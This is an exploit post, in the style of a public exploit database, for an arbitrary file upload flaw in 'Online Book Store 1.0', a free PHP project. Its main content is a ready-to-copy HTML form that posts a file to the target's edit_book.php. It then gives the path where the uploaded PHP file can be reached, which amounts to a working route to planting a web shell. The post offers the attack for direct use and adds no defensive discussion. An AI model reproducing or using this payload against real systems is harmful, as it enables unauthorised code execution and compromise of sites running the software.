Share
# Exploit Title: Online Book Store 1.0 - Arbitrary File Upload   
# Google Dork: N/A  
# Date: 2020-01-16  
# Exploit Author: Or4nG.M4n aka S4udiExploit   
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/  
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip  
# Version: 1.0  
# Tested on: MY MIND v1.23.45  
# CVE: N/A  
# WWW . SEC4EVER . COM  
-> hola amigos ^.^  
-> just copy this html code   
<form method="post" action="http://TARGET/edit_book.php" enctype="multipart/form-data">  
<td><input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"></td>  
<td><input type="text" name="author" value="Or4nG.M4n aka S4udiExploit" required></td>  
<td><input type="file" name="image"></td>  
<input type="submit" name="save_change" value="Change" class="btn btn-primary">   
</form>  
-> after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php  
# i think am back %^_^%   
# i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com  
# big thanks to Stupid Coder ^.^